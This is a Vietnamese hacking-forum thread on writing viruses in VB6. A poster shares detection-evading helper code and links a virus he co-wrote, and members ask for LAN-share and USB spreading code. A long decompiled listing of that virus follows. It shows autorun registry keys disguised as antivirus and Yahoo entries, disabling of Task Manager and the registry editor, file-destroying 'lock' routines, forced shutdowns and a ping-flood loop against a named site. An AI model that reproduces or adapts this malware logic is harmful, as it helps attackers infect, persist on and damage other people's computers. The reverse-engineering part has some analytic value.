| [Question] Viết virus = vb6.0 |
23/04/2008 09:45:03 (+0700) | #1 | 126914 |
only1bit
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 12/04/2008 21:15:03
Messages: 27
Offline
|
|
Mình viết bài nào cũng bị lock hết hix.
Lần này cố gắng hơn.
Tại sao lại là vb6.0
vb6.0 là một ngôn ngử lập trình tương đối đơn giản. Cú pháp mạch lạc dễ sử dụng.
Có khả năng liên kết cao với windows.
Được mệnh danh là ngôn ngữ lập trình số 1 trên windows.
Vậy khi dùng VB6.0 viết virus bạn được lợi gì.
1. dễ gọi hàm hệ thống.
2. các chương trình diệt virus khó debug vì vb6.0 không trực tiếp truy cập các hàm API mà gọi thông qua MSVB60.DLL.
3. kích thước EXE nhỏ (không giống như MSVC++ quá cồng kềnh).
4. dễ viết.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tôi viết virus bằng cách xây dựng các hàm cơ bản trước đây là 1 trong số đó.
(Các hàm khác tôi sẽ POST sau nha)
Function RndName() 'Tạo file name ngẩu nhiên <- không cố định file name để tránh bị phát hiện
Dim X As Byte
Dim Buff As String
While Len(Buff)<5
While (X<56) or (X>90) 'Lấy các chử loại bỏ các kí tự đặc biệt file name mà
X = Round(Rnd()*255)
Wend
Buff = Buff & Chr(X)
Wend
RndName = Buff
End Function |
|
|
 |
|
| [Question] Re: Viết virus = vb6.0 |
23/04/2008 09:50:18 (+0700) | #2 | 126916 |
only1bit
Member
|
|
0 |
|
|
Joined: 12/04/2008 21:15:03
Messages: 27
Offline
|
|
Hàm chuyển đường dẩn không kèm \ -> có \
Ví dụ: C:\Windows -> C:\Windows\
Hàm này rất có lợi khi tìm kiếm thư mục.
++++++++++++++++++++++++++++++++++++++
Function PathCover(Path As String)
If Right(Path,1)="\" Then
PathCover = Path
Else
PathCover = Path & "\"
End If
End Function |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
23/04/2008 21:44:16 (+0700) | #3 | 126998 |
![[Avatar]](/hvaonline/images/avatar/fbf640737fe25f9827c4ef77c8a6d823.jpg "[Avatar]")
|
thephatcompany
Member
|
|
0 |
|
|
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
|
|
| Viết như vậy là hơi hiền, tập viết như mấy thằng China đó, Nên chuyển sang tập viết diệt đi. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
23/04/2008 22:03:32 (+0700) | #4 | 127008 |
![[Avatar]](/hvaonline/images/avatar/7ba3e85f50742b496089e833bfa28f7e.jpg "[Avatar]")
|
Look2Me
Member
|
|
0 |
|
|
Joined: 26/07/2006 23:30:57
Messages: 235
Location: Tủ quần nào
Offline
|
|
| Bạn thử viết 1 đoạn quét thư mục chia sẻ trong mạng LAN rồi lây vào đó được không? |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
23/04/2008 22:11:55 (+0700) | #5 | 127011 |
|
thephatcompany
Member
|
|
0 |
|
|
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
|
|
| Mình đâu biết viết, mà có viết cũng không thể nào lây được nếu Lan không share full! |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
23/04/2008 22:15:13 (+0700) | #6 | 127013 |
| VB6.0 mà dùng để viết VR thì chỉ làm mồi ngon cho anh BKAV. Nó quá yếu! |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
24/04/2008 00:56:24 (+0700) | #7 | 127073 |
only1bit
Member
|
|
0 |
|
|
Joined: 12/04/2008 21:15:03
Messages: 27
Offline
|
|
Bạn nghĩ Bkav mạnh đến thế sao.
Nhận diện virus quá kém lại còn dễ bi disable nửa hix !
Làm sao so sánh được với BitDefenfer hay KAV,AVG....
Chẳng qua là Bkav không bị các virus chú ý thôi (Nó quá yếu mà).
Đây là virus được mình và BlackMoon & Moon_Of_Demon viết
http://needyou.awardspace.com/
Bạn nào không vô được sài proxy nha. Trang web này bị khóa rồi. Nhớ tắt chương trình download đi.
Ai nghi ngờ VB6.0 thì add+ nick chát mình, cải nhau tay đôi.
VB6.0 Cực kì khó debug !
Mình sợ dạy bằng TASM32 các bạn không hiểu. Chuối khô dầu ạ. Đừng cho rằng mình giỏi hơn người ta nha. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
24/04/2008 01:01:42 (+0700) | #8 | 127075 |
only1bit
Member
|
|
0 |
|
|
Joined: 12/04/2008 21:15:03
Messages: 27
Offline
|
|
Ngày nay bộ bạn nghĩ các LAN administrator ngu đến nổi share full rồi còn không đặt mật khẩu cho quyền admin như các hồi bị con NetHook pháp sao.
Bạn mà vô mấy cái mạng LAN ở quán chat thì củng nhỉ có quyền read only là nhìu lắm rồi. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
24/04/2008 17:03:42 (+0700) | #9 | 127281 |
Bác share em đoạn code phát hiện ổ đĩa di động khi cắm vào đi,với cả lúc mà nó phát hiện một process nào đó bị tắt thì enable lại process đó.Em tò mò quá  |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
24/04/2008 20:04:22 (+0700) | #10 | 127293 |
![[Avatar]](/hvaonline/images/avatar/19e901474bd32d47931f0219992ff889.png "[Avatar]")
|
hacnho
HVA Friend
|
Joined: 28/01/2003 12:07:45
Messages: 199
Location: OEP
Offline
|
|
Mới xem con virus Lover của bạn. Nhiều đoạn hài vật  !
Object: F
Private Sub M_Timer() Address: 40EDD0
Private Sub W_Timer() Address: 40EF90
Private Sub Y_Timer() Address: 40FCA0
Private Sub S_Timer() Address: 40EEB0
Private Sub Form_Load() Address: 40E3A0
Public Function PathCover(Path) Address: 407870
Public Function RndName() Address: 407980
Public Sub ScanSys() Address: 407C10
Public Sub ScanDir(Path) Address: 407FC0
Public Sub ScanA() Address: 408280
Public Function FindUSB() Address: 408650
Public Sub MakeTmp() Address: 408D20
Public Sub LoadTmp() Address: 408D90
Public Sub SaveTmp() Address: 408F40
Public Sub LockFile(FileName) Address: 409140
Public Sub UnLockFile(FileName) Address: 409360
Public Function EnCode(StringValue) Address: 409520
Public Sub Destroy() Address: 4097E0
Public Sub BitToy() Address: 40B270
Public Sub DelayAV() Address: 40B920
Public Sub CheckMe() Address: 40BBF0
Public Function SafeMe(AntiPro) Address: 40BE50
Public Sub AutoSafe() Address: 40BFB0
Public Sub SysCopy() Address: 40C470
Public Sub InsertChar(Code) Address: 40CF30
Public Sub YSent() Address: 40D180
Public Function YCheck(KeyRead, MyVoice) Address: 40E100
Đoạn này:
Code:
Public Sub BitToy() '40B270
loc_0040B295: var_08 = &H401320
loc_0040B2A7: call eax+04h(arg_08, edi, esi, ebx, fs:[00h], MSVBVM60.DLL.__vbaExceptHandler, ebp)
loc_0040B2E0: var_38 = 80020004h
loc_0040B2EA: Randomize(10)
loc_0040B2F3: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B2FC: var_38 = 80020004h
loc_0040B300: var_40 = 10
loc_0040B307: var_40 = Rnd(%x2)
loc_0040B30D: fstp real4 ptr var_000000C4
loc_0040B313: fld real4 ptr var_000000C4
loc_0040B319: fmul real4 ptr [0040131Ch] ;
loc_0040B32A: fstp real4 ptr var_48
loc_0040B32D: fstsw ax
loc_0040B331: If MSVBVM60.DLL.__vbaFreeVar = 0 Then
loc_0040B346: call MSVBVM60.DLL.__vbaUI1Var(Round(4, esi))
loc_0040B36B: If var_60 = 0 Then
loc_0040B370: call eax+00000300h(arg_08)
loc_0040B37B: var_30 = IsSet(eax+00000300h(arg_08))
loc_0040B38B: call edx+64h(eax+00000300h(arg_08), 00002710h)
loc_0040B392: If edx+64h(eax+00000300h(arg_08), 00002710h) < esi Then
loc_0040B39D: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+64h(eax+00000300h(arg_08), 00002710h), eax+00000300h(arg_08), 00405C88h, 00000064h)
loc_0040B3A3: End If
loc_0040B3A6: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B3AC: End If
loc_0040B3B0: If byte ptr var_1C = 01h Then
loc_0040B3B5: call MSVBVM60.DLL.__vbaStrI2(esi, esi, esi)
loc_0040B3C6: call MSVBVM60.DLL.__vbaStrMove
loc_0040B3CD: call MSVBVM60.DLL.__vbaStrToAnsi("", MSVBVM60.DLL.__vbaStrMove)
loc_0040B3DD: call MSVBVM60.DLL.__vbaStrToAnsi("", "set cdaudio door open", MSVBVM60.DLL.__vbaStrToAnsi("", MSVBVM60.DLL.__vbaStrMove))
loc_0040B3E4: Proc_004058C8(MSVBVM60.DLL.__vbaStrToAnsi("", "set cdaudio door open", MSVBVM60.DLL.__vbaStrToAnsi("", MSVBVM60.DLL.__vbaStrMove)), MSVBVM60.DLL.__vbaStrI2(esi, esi, esi), "")
loc_0040B3E9: call MSVBVM60.DLL.__vbaSetSystemError(MSVBVM60.DLL.__vbaStrToAnsi("", "set cdaudio door open", MSVBVM60.DLL.__vbaStrToAnsi("", MSVBVM60.DLL.__vbaStrMove)))
loc_0040B406: GoTo loc_40B40E
loc_0040B408: End If
loc_0040B40E: 'Referenced from 0040B406
loc_0040B412: If byte ptr var_1C = 02h Then
loc_0040B431: var_68 = 80020004h
loc_0040B434: var_58 = 80020004h
loc_0040B437: var_00000098 = "Hi world !"
loc_0040B441: var_000000A0 = 8
loc_0040B45A: var_00000088 = "Hello my name is HoaiTranMGF by Bit.Kill3r"
loc_0040B464: var_00000090 = 8
loc_0040B489: MsgBox("Hello my name is HoaiTranMGF by Bit.Kill3r", 00001000h, "Hi world !", 10, 10)
loc_0040B4AA: End If
loc_0040B4AE: If byte ptr var_1C = 03h Then
loc_0040B4B9: var_00000088 = "shutdown -f"
loc_0040B4C3: var_00000090 = 8
loc_0040B4CD: var_40 = "shutdown -f"
loc_0040B4D8: var_40 = Shell(esi, %x3)
loc_0040B4E1: fstp st(0)
loc_0040B4E3: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B4E9: End If
loc_0040B4ED: If byte ptr var_1C = 04h Then
loc_0040B4FF: var_40 = Chr(00000022h)
loc_0040B507: var_70 = Chr(00000022h)
loc_0040B51A: var_00000090 = 8
loc_0040B520: var_000000A0 = 8
loc_0040B530: var_00000088 = "shutdown -s -t 10 -c"
loc_0040B53A: var_00000098 = "Hello ! my name is HoaiTrangMGF by Bit.Kill3r"
loc_0040B544: call MSVBVM60.DLL.__vbaVarCat("", var_40, var_00000090, esi)
loc_0040B552: call MSVBVM60.DLL.__vbaVarCat("", var_000000A0, MSVBVM60.DLL.__vbaVarCat("", var_40, var_00000090, esi))
loc_0040B55D: call MSVBVM60.DLL.__vbaVarCat("", var_70, MSVBVM60.DLL.__vbaVarCat("", var_000000A0, MSVBVM60.DLL.__vbaVarCat("", var_40, var_00000090, esi)))
loc_0040B560: MSVBVM60.DLL.__vbaVarCat("", var_70, MSVBVM60.DLL.__vbaVarCat("", var_000000A0, MSVBVM60.DLL.__vbaVarCat("", var_40, var_00000090, esi))) = Shell(%x2, %x3)
loc_0040B57C: fstp st(0)
loc_0040B58A: End If
loc_0040B58E: If byte ptr "" >= 05h Then
loc_0040B593: call ecx+00000728h(arg_08)
loc_0040B59B: If ecx+00000728h(arg_08) < esi Then
loc_0040B5A9: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+00000728h(arg_08), arg_08, 00405544h, 00000728h)
loc_0040B5AF: End If
loc_0040B5AF: End If
loc_0040B5BE: call &(":home", "")
loc_0040B5C5: call MSVBVM60.DLL.__vbaStrMove
loc_0040B5CD: call &("13#1", MSVBVM60.DLL.__vbaStrMove)
loc_0040B5D4: call MSVBVM60.DLL.__vbaStrMove
loc_0040B5D9: call MSVBVM60.DLL.__vbaFreeStr
loc_0040B5EA: call MSVBVM60.DLL.__vbaUI1I2
loc_0040B5F4: call MSVBVM60.DLL.__vbaUI1I2
loc_0040B600: If MSVBVM60.DLL.__vbaUI1I2 <= MSVBVM60.DLL.__vbaUI1I2 Then
loc_0040B60B: call &("ping", "")
loc_0040B612: call MSVBVM60.DLL.__vbaStrMove
loc_0040B61A: call &("musicdanang.tv", MSVBVM60.DLL.__vbaStrMove)
loc_0040B621: call MSVBVM60.DLL.__vbaStrMove
loc_0040B629: call &("-n 1 -l 65500", MSVBVM60.DLL.__vbaStrMove)
loc_0040B630: call MSVBVM60.DLL.__vbaStrMove
loc_0040B638: call &("13#1", MSVBVM60.DLL.__vbaStrMove)
loc_0040B63F: call MSVBVM60.DLL.__vbaStrMove
loc_0040B65A: al = al + bl
loc_0040B65C: If Not Asm.b_flag Then
loc_0040B662: GoTo loc_40B5F6
loc_0040B664: End If
loc_0040B66D: call &("ping", "")
loc_0040B674: call MSVBVM60.DLL.__vbaStrMove
loc_0040B67C: call &("musicdanang.tv", MSVBVM60.DLL.__vbaStrMove)
loc_0040B683: call MSVBVM60.DLL.__vbaStrMove
loc_0040B68B: call &("-n 2 -l 65500", MSVBVM60.DLL.__vbaStrMove)
loc_0040B692: call MSVBVM60.DLL.__vbaStrMove
loc_0040B69A: call &("13#1", MSVBVM60.DLL.__vbaStrMove)
loc_0040B6A1: call MSVBVM60.DLL.__vbaStrMove
loc_0040B6C3: call &("goto home", "")
loc_0040B6CA: call MSVBVM60.DLL.__vbaStrMove
loc_0040B6D3: If 411340h = 0 Then
loc_0040B6DF: CreateObject(00405AA8h, 00411340h)
loc_0040B6E5: End If
loc_0040B6F2: call eax+14h(00411340h, var_30)
loc_0040B6F9: If eax+14h(00411340h, var_30) < 0 Then
loc_0040B704: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+14h(00411340h, var_30), 00411340h, 00405E80h, 00000014h)
loc_0040B70A: End If
loc_0040B716: call edx+50h(var_30, "")
loc_0040B71D: If edx+50h(var_30, "") < 0 Then
loc_0040B728: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+50h(var_30, ""), var_30, 00405AB8h, 00000050h)
loc_0040B72E: End If
loc_0040B734: var_20 = 0
loc_0040B73B: call MSVBVM60.DLL.__vbaStrMove
loc_0040B74B: call edx+000006F8h(arg_08, "", "")
loc_0040B753: If edx+000006F8h(arg_08, "", "") < 0 Then
loc_0040B761: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, "", ""), arg_08, 00405544h, 000006F8h)
loc_0040B767: End If
loc_0040B770: call &("POD.bat", "")
loc_0040B777: call MSVBVM60.DLL.__vbaStrMove
loc_0040B780: call Open #(00000020h, FFFFFFFFh, 00000001h, MSVBVM60.DLL.__vbaStrMove)
loc_0040B7A0: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B7AE: call Put #(00000000h, "", 00000001h)
loc_0040B7B6: Close 00000001h
loc_0040B7C3: If 411340h = 0 Then
loc_0040B7CF: CreateObject(00405AA8h, 00411340h)
loc_0040B7D5: End If
loc_0040B7E2: call ecx+14h(00411340h, var_30)
loc_0040B7E9: If ecx+14h(00411340h, var_30) < 0 Then
loc_0040B7F4: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+14h(00411340h, var_30), 00411340h, 00405E80h, 00000014h)
loc_0040B7FA: End If
loc_0040B806: call ecx+50h(var_30, var_20)
loc_0040B80D: If ecx+50h(var_30, var_20) < 0 Then
loc_0040B818: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+50h(var_30, var_20), var_30, 00405AB8h, 00000050h)
loc_0040B81E: End If
loc_0040B824: var_20 = 0
loc_0040B82B: call MSVBVM60.DLL.__vbaStrMove
loc_0040B83B: call eax+000006F8h(arg_08, "", "")
loc_0040B843: If eax+000006F8h(arg_08, "", "") < 0 Then
loc_0040B851: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+000006F8h(arg_08, "", ""), arg_08, 00405544h, 000006F8h)
loc_0040B857: End If
loc_0040B860: call &("POD.bat", "")
loc_0040B86B: var_40 = 8
loc_0040B872: var_40 = Shell(00000000h, %x3)
loc_0040B882: fstp st(0)
loc_0040B890: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B899: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B8A5: GoTo loc_40B8EB
loc_0040B8C5: call MSVBVM60.DLL.__vbaFreeObj(0040B8F5h)
loc_0040B8EA: ret
loc_0040B8EB: 'Referenced from 0040B8A5
loc_0040B8EE: call MSVBVM60.DLL.__vbaFreeStr
loc_0040B8F4: ret
loc_0040B8FB: call ecx+08h(arg_08)
loc_0040B911: retn 0004h
loc_0040B914: End If
loc_0040B914: GoTo loc_MSVBVM60.DLL.__vbaFPException
loc_0040B919: End If
loc_0040B919: call MSVBVM60.DLL.__vbaErrorOverflow
End Sub
Lock file kiểu này đây hả !
Code:
Public Sub LockFile(FileName) '409140
loc_00409162: var_08 = &H401250
loc_00409174: call ecx+04h(arg_08, edi, esi, ebx, fs:[00h], MSVBVM60.DLL.__vbaExceptHandler, ebp)
loc_00409199: call Open #(00000020h, FFFFFFFFh, 00000001h, edx)
loc_004091A4: "This File Was Destroy By HoaiTrang MGF [Bit.Kill3r] = Len(%x2)
loc_004091AC: call MSVBVM60.DLL.__vbaI2I4
loc_004091C8: If 00000001h <= var_64 Then
loc_004091D0: call MSVBVM60.DLL.__vbaGet3(00000001h, var_20, 00000001h)
loc_004091DC: and eax, 000000FFh
loc_004091E6: var_50 = ""
loc_004091E9: var_58 = 8
loc_004091F0: var_38 = Chr(var_20)
loc_00409202: call MSVBVM60.DLL.__vbaVarCat("", var_38, var_58)
loc_00409209: call MSVBVM60.DLL.__vbaStrVarMove(MSVBVM60.DLL.__vbaVarCat("", var_38, var_58))
loc_00409214: call MSVBVM60.DLL.__vbaStrMove
loc_0040922C: cx = cx + si
loc_0040922F: If Err.Number <> 0 Then GoTo loc_0040934F
loc_00409237: GoTo loc_4091C2
loc_00409239: End If
loc_0040923F: Close %x1
loc_0040924D: call Open #(00000020h, FFFFFFFFh, 00000001h, edx)
loc_0040925B: call MSVBVM60.DLL.__vbaStrCopy
loc_00409269: call Put #(00000000h, "", 00000001h)
loc_00409278: call MSVBVM60.DLL.__vbaFreeStr
loc_0040927C: Close 00000001h
[b] loc_00409289: call &(".lock", edx)[/b]
loc_00409294: call MSVBVM60.DLL.__vbaStrMove
loc_0040929D: call Open #(00000020h, FFFFFFFFh, 00000001h, MSVBVM60.DLL.__vbaStrMove)
loc_004092A6: call MSVBVM60.DLL.__vbaFreeStr
loc_004092B6: call ecx+00000724h(arg_08, "", "")
loc_004092BE: If ecx+00000724h(arg_08, "", "") < 0 Then
loc_004092CF: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+00000724h(arg_08, "", ""), arg_08, 00405544h, 00000724h)
loc_004092D5: End If
loc_004092DB: var_24 = 0
loc_004092E2: call MSVBVM60.DLL.__vbaStrMove
loc_004092EC: call Put #(00000000h, "", 00000001h)
loc_004092F5: call MSVBVM60.DLL.__vbaFreeStr
loc_004092F9: Close 00000001h
loc_00409300: GoTo loc_409326
loc_00409325: ret
loc_00409326: 'Referenced from 00409300
loc_00409329: call MSVBVM60.DLL.__vbaFreeStr(00409330h)
loc_0040932F: ret
loc_00409336: call ecx+08h(arg_08)
loc_0040934C: retn 0008h
loc_0040934F: 'Referenced from 040922F
loc_0040934F: call MSVBVM60.DLL.__vbaErrorOverflow
End Sub
Và" )
Code:
Public Sub SysCopy() '40C470
loc_0040C495: var_08 = &H4013B0
loc_0040C4A7: call eax+04h(arg_08, edi, esi, ebx, fs:[00h], MSVBVM60.DLL.__vbaExceptHandler, ebp)
loc_0040C4F9: If 411340h = edi Then
loc_0040C505: CreateObject(00405AA8h, 00411340h)
loc_0040C50B: End If
loc_0040C518: call ecx+14h(00411340h, "")
loc_0040C51F: If ecx+14h(00411340h, "") < edi Then
loc_0040C52A: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+14h(00411340h, ""), 00411340h, 00405E80h, 00000014h)
loc_0040C530: End If
loc_0040C53C: call ecx+50h("", "")
loc_0040C543: If ecx+50h("", "") < edi Then
loc_0040C54E: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+50h("", ""), "", 00405AB8h, 00000050h)
loc_0040C554: End If
loc_0040C563: call MSVBVM60.DLL.__vbaStrMove
loc_0040C570: call eax+000006F8h(arg_08, "", "")
loc_0040C578: If eax+000006F8h(arg_08, "", "") < edi Then
loc_0040C586: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+000006F8h(arg_08, "", ""), arg_08, 00405544h, 000006F8h)
loc_0040C58C: End If
loc_0040C592: If 00411340h = edi Then
loc_0040C59E: CreateObject(00405AA8h, 00411340h)
loc_0040C5A4: End If
loc_0040C5B1: call eax+14h(00411340h, "")
loc_0040C5B8: If eax+14h(00411340h, "") < 0 Then
loc_0040C5C3: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+14h(00411340h, ""), 00411340h, 00405E80h, 00000014h)
loc_0040C5C9: End If
loc_0040C5D5: call edx+58h("", "")
loc_0040C5DC: If edx+58h("", "") < 0 Then
loc_0040C5E7: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+58h("", ""), "", 00405AB8h, 00000058h)
loc_0040C5ED: End If
loc_0040C5F8: call edx+000006F8h(arg_08, esi+48h, "")
loc_0040C600: If edx+000006F8h(arg_08, esi+48h, "") < 0 Then
loc_0040C60E: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, esi+48h, ""), arg_08, 00405544h, 000006F8h)
loc_0040C614: End If
loc_0040C623: call &("UnInstall.exe", "")
loc_0040C62A: call MSVBVM60.DLL.__vbaStrMove
loc_0040C635: call &("", "", MSVBVM60.DLL.__vbaStrMove)
loc_0040C63C: call MSVBVM60.DLL.__vbaStrMove
loc_0040C644: call &(".exe", MSVBVM60.DLL.__vbaStrMove)
loc_0040C64B: call MSVBVM60.DLL.__vbaStrMove
loc_0040C64E: FileCopy MSVBVM60.DLL.__vbaStrMove, %x2
loc_0040C692: If 411340h = 0 Then
loc_0040C69E: CreateObject(00405AA8h, 00411340h)
loc_0040C6A4: End If
loc_0040C6B6: call edx+14h(411340h, "")
loc_0040C6BD: If edx+14h(411340h, "") < 0 Then
loc_0040C6CE: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+14h(411340h, ""), 411340h, 00405E80h, 00000014h)
loc_0040C6D4: End If
loc_0040C6E4: call ecx+50h("", "")
loc_0040C6EB: If ecx+50h("", "") < 0 Then
loc_0040C6FC: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+50h("", ""), "", 00405AB8h, 00000050h)
loc_0040C702: End If
loc_0040C708: var_18 = 0
loc_0040C70F: call MSVBVM60.DLL.__vbaStrMove
loc_0040C71C: call edx+000006F8h(arg_08, "", "")
loc_0040C724: If edx+000006F8h(arg_08, "", "") < 0 Then
loc_0040C732: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, "", ""), arg_08, 00405544h, 000006F8h)
loc_0040C738: End If
loc_0040C73F: If 411340h = 0 Then
loc_0040C74B: CreateObject(00405AA8h, 00411340h)
loc_0040C751: End If
loc_0040C763: call edx+14h(411340h, "")
loc_0040C76A: If edx+14h(411340h, "") < 0 Then
loc_0040C77B: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+14h(411340h, ""), 411340h, 00405E80h, 00000014h)
loc_0040C781: End If
loc_0040C791: call ecx+58h("", "")
loc_0040C798: If ecx+58h("", "") < 0 Then
loc_0040C7A9: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+58h("", ""), "", 00405AB8h, 00000058h)
loc_0040C7AF: End If
loc_0040C7BA: call edx+000006F8h(arg_08, esi+4Ch, "")
loc_0040C7C2: If edx+000006F8h(arg_08, esi+4Ch, "") < 0 Then
loc_0040C7D0: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, esi+4Ch, ""), arg_08, 00405544h, 000006F8h)
loc_0040C7D6: End If
loc_0040C7DF: call &("Unt32.exe", "")
loc_0040C7E6: call MSVBVM60.DLL.__vbaStrMove
loc_0040C7F1: call &("", "", MSVBVM60.DLL.__vbaStrMove)
loc_0040C7F8: call MSVBVM60.DLL.__vbaStrMove
loc_0040C800: call &(".exe", MSVBVM60.DLL.__vbaStrMove)
loc_0040C807: call MSVBVM60.DLL.__vbaStrMove
loc_0040C80A: FileCopy MSVBVM60.DLL.__vbaStrMove, %x2
loc_0040C857: var_000000B4 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BkavFW"
loc_0040C861: var_000000BC = 8
loc_0040C867: call edx+000006F8h(arg_08, esi+48h, var_18)
loc_0040C86F: If edx+000006F8h(arg_08, esi+48h, var_18) < 0 Then
loc_0040C87D: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, esi+48h, var_18), arg_08, 00405544h, 000006F8h)
loc_0040C883: End If
loc_0040C88C: call &("UnInstall.exe", var_18)
loc_0040C893: var_000000EC = 8
loc_0040C8A4: var_4C = 8
loc_0040C912: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040C915: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040C921: call MSVBVM60.DLL.__vbaFreeStr
loc_0040C92A: call MSVBVM60.DLL.__vbaFreeVar
loc_0040C93B: var_000000B4 = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yahoo"
loc_0040C945: var_000000BC = 8
loc_0040C94F: call ecx+000006F8h(arg_08, esi+48h, var_18)
loc_0040C957: If ecx+000006F8h(arg_08, esi+48h, var_18) < 0 Then
loc_0040C965: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+000006F8h(arg_08, esi+48h, var_18), arg_08, 00405544h, 000006F8h)
loc_0040C96B: End If
loc_0040C974: call &("UnInstall.exe", var_18)
loc_0040C988: var_4C = 8
loc_0040C98B: var_000000EC = 8
loc_0040C9FB: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040C9FE: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CA0A: call MSVBVM60.DLL.__vbaFreeStr
loc_0040CA13: call MSVBVM60.DLL.__vbaFreeVar
loc_0040CA24: var_000000B4 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vknt"
loc_0040CA2E: var_000000BC = 8
loc_0040CA38: call ecx+000006F8h(arg_08, esi+4Ch, var_18)
loc_0040CA40: If ecx+000006F8h(arg_08, esi+4Ch, var_18) < 0 Then
loc_0040CA4E: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+000006F8h(arg_08, esi+4Ch, var_18), arg_08, 00405544h, 000006F8h)
loc_0040CA54: End If
loc_0040CA5D: call &("Unt32.exe", var_18)
loc_0040CA71: var_4C = 8
loc_0040CA74: var_000000EC = 8
loc_0040CAE4: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CAE7: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CAF3: call MSVBVM60.DLL.__vbaFreeStr
loc_0040CAFC: call MSVBVM60.DLL.__vbaFreeVar
loc_0040CB0D: var_000000B4 = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ctfcomon"
loc_0040CB17: var_000000BC = 8
loc_0040CB21: call ecx+000006F8h(arg_08, esi+4Ch, var_18)
loc_0040CB29: If ecx+000006F8h(arg_08, esi+4Ch, var_18) < 0 Then
loc_0040CB37: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+000006F8h(arg_08, esi+4Ch, var_18), arg_08, 00405544h, 000006F8h)
loc_0040CB3D: End If
loc_0040CB46: call &("Unt32.exe", var_18)
loc_0040CB5A: var_4C = 8
loc_0040CB5D: var_000000EC = 8
loc_0040CBCD: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CBD0: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CBDC: call MSVBVM60.DLL.__vbaFreeStr
loc_0040CBE5: call MSVBVM60.DLL.__vbaFreeVar
loc_0040CBF5: var_000000BC = 8
loc_0040CBFB: var_000000FC = 8
loc_0040CC0E: var_000000B4 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
loc_0040CC78: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CC7B: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CC8B: var_000000BC = 8
loc_0040CC91: var_000000FC = 8
loc_0040CCA4: var_000000B4 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr"
loc_0040CD0E: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CD11: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CD25: call ecx+000006F8h(arg_08, esi+4Ch, var_18)
loc_0040CD2D: If ecx+000006F8h(arg_08, esi+4Ch, var_18) < 0 Then
loc_0040CD3B: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+000006F8h(arg_08, esi+4Ch, var_18), arg_08, 00405544h, 000006F8h)
loc_0040CD41: End If
loc_0040CD4A: call &("Unt32.exe", var_18)
loc_0040CD5F: var_5C = 8
